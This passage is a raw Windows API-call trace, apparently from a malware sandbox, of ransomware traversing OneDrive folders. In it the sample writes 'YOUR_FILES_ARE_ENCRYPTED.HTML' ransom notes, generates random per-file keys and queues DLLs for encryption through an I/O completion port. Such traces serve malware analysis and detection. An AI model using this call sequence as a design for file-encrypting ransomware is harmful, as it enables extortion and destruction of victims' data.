returned=".mui" [0162.913] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.914] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.914] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\uz-latn-uz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.914] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.916] CloseHandle (hObject=0x5ac) returned 1 [0162.917] GetProcessHeap () returned 0x270000 [0162.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.917] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac9850b0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vi", cAlternateFileName="")) returned 1 [0162.917] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi") returned 74 [0162.917] GetProcessHeap () returned 0x270000 [0162.917] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.918] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi" [0162.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\*" [0162.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.927] FindNextFileW (in: 
hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.927] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.927] lstrlenW (lpString=".mui") returned 4 [0162.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.927] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\vi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.928] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.930] CloseHandle (hObject=0x5ac) returned 1 [0162.930] GetProcessHeap () returned 0x270000 [0162.931] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.931] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4f607d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f607d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4faca90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x652a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="VideoStreamingPlugin.dll", cAlternateFileName="VIDEOS~1.DLL")) returned 1 [0162.931] wnsprintfW (in: pszDest=0x74c2008, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll") returned 96 [0162.931] lstrcmpW (lpString1="VideoStreamingPlugin.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.931] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0162.931] lstrlenW (lpString=".dll") returned 4 [0162.931] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0162.931] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\videostreamingplugin.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0162.932] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=414368) returned 1 [0162.932] GetProcessHeap () returned 0x270000 [0162.932] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.935] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="1C") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="B4") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="70") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F8") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="58") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="40") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="13") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd12e, 
param_2="%02X" | out: param_1="49") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="37") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="9E") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="C9") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="2F") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="60") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="6D") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A6") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="A3") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="39") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="6B") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="5B") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="47") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="27") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="29") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="84") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="54") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CE") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7C") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="19") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="C4") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="A4") returned 2 [0162.936] wsprintfW 
(in: param_1=0x4ebd186, param_2="%02X" | out: param_1="A5") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="0E") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="4C") returned 2 [0162.937] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll" [0162.937] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.937] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.937] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa50912d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa50912d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa50912d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x684a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="wlmfds.dll", cAlternateFileName="")) returned 1 [0162.937] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll") returned 82 [0162.937] lstrcmpW (lpString1="wlmfds.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.937] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0162.937] lstrlenW (lpString=".dll") returned 4 [0162.937] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0162.937] 
SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\wlmfds.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0162.938] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=427168) returned 1 [0162.938] GetProcessHeap () returned 0x270000 [0162.938] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0162.943] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="99") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="20") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="33") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="27") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="2E") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="5C") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="21") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="D1") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="88") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="AE") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="35") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="9B") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6B") returned 2 [0162.943] wsprintfW (in: 
param_1=0x4ebd146, param_2="%02X" | out: param_1="FD") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="03") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="ED") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="B7") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="79") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="86") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="11") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D0") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="DB") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="38") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="44") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="41") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A4") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="ED") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="EA") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="BA") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="7E") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="D9") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="42") returned 2 [0162.944] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll" [0162.945] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.945] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0162.945] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa52341f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa52341f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x60ca8, dwReserved0=0x0, dwReserved1=0x60, cFileName="WnsClientApi.dll", cAlternateFileName="WNSCLI~1.DLL")) returned 1 [0162.945] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll") returned 88 [0162.945] lstrcmpW (lpString1="WnsClientApi.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.945] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0162.945] lstrlenW (lpString=".dll") returned 4 [0162.945] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0162.945] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\wnsclientapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 
0x5b8 [0162.945] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=396456) returned 1 [0162.945] GetProcessHeap () returned 0x270000 [0162.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0162.948] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="52") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="C5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="F0") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="26") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="6A") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="00") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="8B") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="96") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="94") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="05") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="D5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C6") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="5E") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="E4") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="D5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="68") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="4E") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="A3") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="71") 
returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D3") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="E0") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="29") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="DD") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="D4") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A3") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="62") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="71") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="BC") returned 2 [0162.949] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="FB") returned 2 [0162.949] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="4A") returned 2 [0162.949] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="3B") returned 2 [0162.949] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll" [0162.949] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.949] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0162.950] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="wo", cAlternateFileName="")) returned 1 [0162.950] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo") returned 74 [0162.950] GetProcessHeap () returned 0x270000 [0162.950] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.951] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo" [0162.951] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\*") 